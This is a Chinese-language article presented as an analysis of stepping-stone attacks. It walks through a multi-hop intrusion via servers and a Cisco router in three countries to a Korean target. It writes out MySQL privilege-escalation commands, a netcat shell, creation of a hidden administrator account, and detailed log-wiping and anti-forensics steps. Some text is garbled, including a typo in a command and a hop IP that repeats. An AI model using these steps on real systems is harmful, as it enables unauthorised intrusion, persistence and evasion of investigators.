跳板攻擊入侵技術(shù)案例解析

網(wǎng)絡(luò)入侵， 安全第一。 一個(gè)狡猾、高明的入侵者， 不會(huì)冒然實(shí)行動(dòng)。 他們?cè)谌肭謺r(shí)前會(huì)做足功課， 入侵時(shí)會(huì)通過各種技術(shù)手段保護(hù)自己， 以防被對(duì)方發(fā)現(xiàn)， 引火燒身。 其中， 跳板技術(shù)是攻擊者通常采用的技術(shù)。 下面筆者結(jié)合實(shí)例， 解析攻擊入侵中的跳板技術(shù)。

　　1、確定目標(biāo)

　　攻擊者在通過掃描工具進(jìn)行定點(diǎn)(IP)掃描或者對(duì)某IP段掃描的過程中發(fā)現(xiàn)了該系統(tǒng)(服務(wù)器)的某個(gè)漏洞， 然后準(zhǔn)備實(shí)施攻擊。

　　比如， 筆者通過對(duì)某IP段的掃描， 發(fā)現(xiàn)該IP段IP地址為211.52.*.84的主機(jī)存在MYSQL漏洞， 可以通過提權(quán)獲取系統(tǒng)權(quán)限進(jìn)而控制該服務(wù)器。

　　2、設(shè)計(jì)跳板

　　跳板通俗講就是一條通往目標(biāo)主機(jī)的主機(jī)鏈， 理論上講當(dāng)然是鏈越長(zhǎng)就越安全， 但是鏈太長(zhǎng)的話連接的速度太慢， 因?yàn)槠渲械闹修D(zhuǎn)太多。 攻擊者往往會(huì)評(píng)估入侵風(fēng)險(xiǎn)， 從而制定或者設(shè)計(jì)跳板。 一般的原則是， 如果是政府、軍隊(duì)等敏感部門往往跳板會(huì)比較多， 甚至這些跳板主機(jī)會(huì)縱橫七大洲四大洋。 另外， 入侵國(guó)內(nèi)服務(wù)器往往也會(huì)需要國(guó)外的跳板主機(jī)。

　　另外跳板主機(jī)的選擇， 入侵者往往是一些安全性一般速度較快， 很少有人光顧的主機(jī)。 因?yàn)槿绻�是跳板出了安全問題， 安全人員從中間入手， 進(jìn)行反向追蹤， 定位入侵者的相對(duì)比較容易。

　　筆者演示進(jìn)行入侵檢測(cè)的目標(biāo)主機(jī)是一家韓國(guó)的服務(wù)器(通過www.ip138.com查詢)， 綜合考慮， 設(shè)計(jì)了三級(jí)跳板， 即通過三個(gè)主機(jī)中轉(zhuǎn)在第三級(jí)跳板上進(jìn)行目標(biāo)主機(jī)的入侵就愛你從。 設(shè)計(jì)的路線為：遠(yuǎn)程登陸(3389)到一IP地址為203.176.*.237的馬來西亞服務(wù)器;然后在該服務(wù)器上通過CMD命令登陸到一IP地址為203.115.*.85的印度Cisco路由器;最后該路由器上telnet到一某韓國(guó)主機(jī)。 最后以該韓國(guó)服務(wù)器為工作平臺(tái)實(shí)施MYSQL提權(quán)操作。

　　特別說明：攻擊者往往在跳板中加入路由器或者交換機(jī)(比如Cisco的產(chǎn)品)， 雖然路由器的日志文件會(huì)記錄登陸IP， 但是可以通過相關(guān)的命令清除該日志。 并且這些日志清除后將永遠(yuǎn)消失， 因?yàn)槁酚善鞯娜罩颈４嬖趂lash中， 一旦刪除將無法恢復(fù)。 如果跳板全部用主機(jī)的話， 雖然也可以清除日志， 但是現(xiàn)在的恢復(fù)軟件往往可以恢復(fù)這些日志， 就會(huì)留下痕跡， 網(wǎng)絡(luò)安全人員可以通過這些蛛絲馬跡可能找到自己。

　　3、跳板入侵

　　(1).第一跳， 遠(yuǎn)程桌面

　　開始→運(yùn)行→mstsc， 打開遠(yuǎn)程桌面連接， 輸入馬來西亞服務(wù)器的IP地址203.176.*.237， 隨后輸入用戶名、密碼即可遠(yuǎn)程連接到該服務(wù)器。

　　一個(gè)非常狡猾高明的的入侵者一般不會(huì)用自己平時(shí)使用的主機(jī)進(jìn)行遠(yuǎn)程桌面連接入侵， 他們往往通過一些人員流動(dòng)比較大的公共電腦進(jìn)行入侵。 如果找不到的話， 他們一般不會(huì)用物理主機(jī)， 會(huì)采用虛擬機(jī)系統(tǒng)進(jìn)行入侵。 因?yàn)槲锢碇鳈C(jī)的入侵會(huì)留下痕跡， 就算刪除格式化也會(huì)被恢復(fù)。 而虛擬機(jī)， 入侵完成后可以刪除， 呼之即來， 棄之毫不可惜。

　　(2).第二跳， telnet路由器

　　打開服務(wù)器命令行工具(cmd)， 輸入telnet 203.115.*.85進(jìn)行連接。 該路由器是一Cisco設(shè)置了虛擬終端的密碼， 輸入密碼進(jìn)入路由器一般模式。 此時(shí)即可以通過路由器telnet到下一個(gè)跳板。 當(dāng)然最好有該cisco路由器的特權(quán)密碼， 敲入en， 然后輸入特權(quán)密碼進(jìn)入特權(quán)模式。 因?yàn)榫退銢]有進(jìn)入路由器的特權(quán)模式， 但路由器還是記錄了此次登陸， 因此一定要進(jìn)入特權(quán)模式， 通過路由器命令清除登陸記錄和歷史命令。 筆者為了安全用SecureCRT(類似telnet)進(jìn)行登陸。

　　作為一個(gè)狡猾的入侵者， 在進(jìn)入路由器特權(quán)模式后， 不是馬上進(jìn)入下一跳板。 往往通過show user命令查看有沒有其他人(特別是管理員)登陸到路由器。 如果存在其他登陸， 一個(gè)謹(jǐn)慎的入侵者往往會(huì)放棄該跳板轉(zhuǎn)而用其他的跳板。

　　(3).第三跳， telnet主機(jī)

　　在路由器特權(quán)模式下， 輸入telnet 203.115.*.85， 隨后輸入用戶名及其密碼后就telnet到遠(yuǎn)程主機(jī)系統(tǒng)給我們一個(gè)shell。

　　4.提權(quán)

　　至此， 我們經(jīng)過三級(jí)跳到達(dá)工作平臺(tái)， 然后就在該shell上進(jìn)行目標(biāo)主機(jī)的MYSQL提權(quán)操作。 操作平臺(tái)上筆者已經(jīng)準(zhǔn)備好了進(jìn)行MYSQL提權(quán)的工具。 輸入命令進(jìn)行操作， 筆者把相關(guān)的命令列舉出來：

　　cd msysql

　　cd bin

　　mysql -h 211.52.118.84 -uroot

　　\. c:\mysql\bin\2003.txt

　　在工作平臺(tái)上再打開一個(gè)cmd， 輸入命令

　　nc 211.52.118.84 3306

　　即監(jiān)聽該ip的3306端口， 返回一個(gè)目標(biāo)主機(jī)的shell， 獲取該主機(jī)的控制權(quán)。

　　在該shell上輸入命令建立管理員用戶

　　net user test test /add

　　net localgour administrators test /add

　　下面看看對(duì)方是否開了遠(yuǎn)程桌面連接， 在命令行下敲入命令

　　netstat -ano

　　對(duì)方開3389端口， 即可以進(jìn)行遠(yuǎn)程桌面的連接。

　　由于對(duì)方是XP系統(tǒng)， 不能多用戶遠(yuǎn)程連接， 筆者的入侵檢測(cè)到此為止。

　　5、全身而退

　　入侵完成獲得目標(biāo)主機(jī)的管理權(quán)限， 入侵者就得擦除痕跡， 準(zhǔn)備撤退了。

　　(1).由于從目標(biāo)主機(jī)獲得的shell反向連接獲得的， 不會(huì)有日志記錄， 所以不用管直接斷開連接。

　　(2).上傳clearlog工具， 清除telnet主機(jī)上的登陸日志。

　　(3).輸入exit， 退出路由器到主機(jī)的的telnet連接。 在路由器上輸入

　　clear logging

　　分別用來清除登陸日志。

　　(4).退出路由器登陸， 通過工具清除遠(yuǎn)程桌面主機(jī)上的登陸日志， 然后刪除登錄用帳戶和用戶目錄， 注銷用戶。

　　總結(jié)：上面筆者結(jié)合實(shí)例演示了入侵者如何通過跳板進(jìn)行入侵以及入侵善后的全過程， 本文只是從技術(shù)的角度對(duì)跳板技術(shù)進(jìn)行解析， 目的是讓有興趣的讀者直觀地了解跳板技術(shù)的相關(guān)細(xì)節(jié)。 當(dāng)然， 跳板技術(shù)是博大精深， 遠(yuǎn)非本文所能囊括， 但其基本原來都類似， 希望文本對(duì)大家了解這種技術(shù)有所幫助。